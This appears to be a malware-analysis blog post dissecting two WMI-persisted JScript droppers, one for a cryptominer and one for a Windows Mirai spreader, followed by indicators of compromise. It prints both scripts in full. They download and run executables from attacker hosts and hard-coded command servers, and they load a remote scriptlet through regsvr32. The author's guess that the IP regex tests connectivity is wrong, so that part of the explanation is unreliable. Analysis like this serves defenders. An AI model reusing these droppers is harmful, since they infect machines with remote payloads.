Fileless Malware: Cryptominer and Mirai via WMI

Today, I picked up a thread on the Malwarebytes Forums where a user reported being infected with malware, detected by Malwarebytes as Hijack.BitCoinMiner.WMI, that would always come back after a restart. The user reported that the detection was coming from the WMI repository, a technique often used by fileless malware to gain persistence on the system and one that is harder for some security products to detect. In this case, the user was able to extract the content of the malicious WMI entry and gave me the two scripts that were being run on his system. After a quick analysis, I found that these scripts are used to spread a Bitcoin miner (1st script) and a Windows variant of Mirai (2nd script). A more in-depth analysis of the second script can be found on both Kaspersky's and Trend Micro's blogs.

https://securelist.com/newish-mirai-spreader-poses-new-risks/77621/
http://newsroom.trendmicro.com/blog/security-intelligence/cryptocurrency-miner-uses-wmi-and-eternalblue-spread-filelessly

So, here’s the 1st script.

// Download psa.jpg (a PE despite the extension, see below) and save it as ps.exe.
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; // adModeReadWrite
s.Type = 1; // adTypeBinary
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\WINDOWS\\ps.exe", 2); // 2 = overwrite an existing file
// Execute the dropped file.
var r = new ActiveXObject("WScript.Shell.1");
r.Run("C:\\WINDOWS\\ps.exe");

Sadly, at the time of writing, the website was down and I couldn't access the file. My guess is that the psa.jpg file is in fact a PE, and a cryptominer.
As for the 2nd script, here it is.

var toff = 3000;
var fso = new ActiveXObject("Scripting.FilesystemObject");
var http = new ActiveXObject("Msxml2.ServerXMLHTTP");
// Seed the C2 list (wpd.xml) with four hard-coded IPs if the file does not exist yet.
if (!fso.FileExists('wpd.xml')) {
  var f = fso.CreateTextFile('wpd.xml', 2);
  f.writeLine('54.255.141.50' + '\r\n' + '78.142.29.152' + '\r\n' + '74.222.14.61' + '\r\n' + '70.39.124.66');
  f.Close();
}
// Read the list back, shuffle it, and pick one server for this run.
var f = fso.OpenTextFile('wpd.xml', 1);
var txt = f.ReadAll().replace(/^\s*|\s*$/g, '').split(/[\r\n]+/);
f.close();
txt.sort(function() {
  return Math.random() > 0.5 ? -1 : 1;
});
var ip = txt[0].replace(/^\s*|\s*$/g, '');
var wsh = new ActiveXObject("WScript.Shell");
var locator = new ActiveXObject("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".", "root/cimv2");
// Terminate every running rundll32.exe, then busy-wait for toff milliseconds.
var colItems = service.ExecQuery("select * from Win32_Process");
var e = new Enumerator(colItems);
var t1 = new Date().valueOf();
for (; !e.atEnd(); e.moveNext()) {
  var p = e.item();
  if (p.Caption == "rundll32.exe") p.Terminate();
}
var t2 = 0;
while (t2 - t1 < toff) {
  var t2 = new Date().valueOf();
}
var pp = service.get("Win32_Process");
// Fetch an updated IP list from the chosen server and save it as wpd1.xml.
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://" + ip + "/wpd/wpd.txt", 0);
x.Send();
var ado = new ActiveXObject("ADODB.Stream");
ado.Mode = 3;
ado.Type = 1;
ado.Open();
ado.Write(x.responseBody);
ado.SaveToFile("wpd1.xml", 2);
ado.Close();
var txtfile = fso.OpenTextFile('wpd1.xml', 1);
var result = txtfile.ReadAll().replace(/^\s*|\s*$/g, '').split(/[\r\n]+/);
txtfile.Close();
// The new list replaces wpd.xml only if every line matches the regex below.
var flag = true;
for (var i = 0; i < result.length; i++) {
  var tmpline = result[i].replace(/^\s*|\s*$/g, '');
  if (!/^(?:(?:[1-9]|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.){3}(?:[1-9]|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])$/.test(tmpline)) flag = false;
}
if (flag) fso.copyfile('wpd1.xml', 'wpd.xml', true);
// kill.html is a download manifest, one "<url> <local path> <run flag>" entry per line.
// Each entry is downloaded to the given path and executed when the flag is 1.
var url1 = "http://" + ip + "/wpd/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) t = arr[i].split(" ", 3), http.open("GET", t[0], !1), http.send(), ado.Type = 1, ado.Open(), ado.Write(http.responseBody), ado.SaveToFile(t[1], 2), ado.Close(), 1 == t[2] && wsh.Run(t[1]);
// Re-register the COM components the script relies on, load a remote scriptlet
// through regsvr32, and start the dropped payload via rundll32.
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://" + ip + "/wpd/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\items.dat,ServiceMain aaaa");

This script is almost an exact copy of the one you can see in Trend Micro's analysis blog post, with a key difference. It'll look for a file called wpd.xml, and if it doesn't exist, it'll create it and write the following IP addresses in it.

54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66

It'll then go through all of these IPs, looking for a file located at $IP_ADDRESS/wpd/wpd.txt to grab additional IP addresses:

54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66
103.213.246.23

You'll notice that these are the same as the ones above, except for the addition of a new one, 103[.]213.246.23. It'll then write all these IPs to a file called wpd1.xml and go through a loop that tests each of these IPs for a condition; if the condition is not met, it sets the flag variable to false. If the flag doesn't get changed (stays at true), the script overwrites the wpd.xml file with wpd1.xml. I'm still not proficient enough when it comes to regex to tell you exactly what the condition tested is, but from what I can see, and if I had to guess, I would say that this loop tests the connectivity to the IP addresses that were grabbed from the wpd.txt link, and if they are still online, it'll replace the wpd.xml file with the wpd1.xml one, to make sure that the C2s it's using are still alive.

Also, from the Kaspersky analysis, it seems that the IPs in the wpd.xml and wpd1.xml files also have files at the links below, but these aren't used in the scripts (they are most likely used by the executables dropped on the system).

hxxp://67.229.99.82:8888/ver.txt - Content below
1.0.0.5
hxxp://67.229.99.82:8888/wpd.jpg - Taylor Swift .jpg
hxxp://67.229.99.82:8888/update.txt - Content below
hxxp://67.229.99.82:8888/wpd.jpg c:\windows\system\msinfo.exe
hxxp://67.229.99.82:8888/my1.html c:\windows\system\my1.bat
hxxp://67.229.99.82:8888/my1.html - Content is the same batch script as the one from Kaspersky's analysis, though the URL points to hxxp://js.mys2018.xyz:280/v.sct
hxxp://67.229.99.82:8888/wpdmd5.txt - Content below
4f16b32732d4ef49e68ad171717f575a
hxxp://67.229.99.82:8888/wpd.dat - File, cannot tell the content, not a PE

This was my first ever blog post, so please forgive me if it's incomplete, hard to read, or if it contains wrong information at all (never mind the numerous typos and grammar mistakes). I'll be more than happy to adjust it with your feedback, so please, don't hesitate!

IOCs:

hxxp://54.255.141.50/wpd/wpd.txt - Content below
54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66
103.213.246.23
hxxp://78.142.29.152/wpd/wpd.txt
hxxp://74.222.14.61/wpd/wpd.txt
hxxp://70.39.124.66/wpd/wpd.txt
hxxp://54.255.141.50/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1
hxxp://78.142.29.152/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://74.222.14.61/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://70.39.124.66/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://67.229.99.82:8888/ups.rar
hxxp://74.222.14.61/v.rar
v.rar: 1d1d243cc181bdd615be960559e6c6f94693a31d0224041313e21adbb381d632
https://www.virustotal.com/#/file/1d1d243cc181bdd615be960559e6c6f94693a31d0224041313e21adbb381d632/detection
ups.rar: 353c696b9b0db39958bc18a51fcc3b879f9f143d261c4cd1a2e521d1b9f98992
https://www.virustotal.com/#/file/353c696b9b0db39958bc18a51fcc3b879f9f143d261c4cd1a2e521d1b9f98992/detection
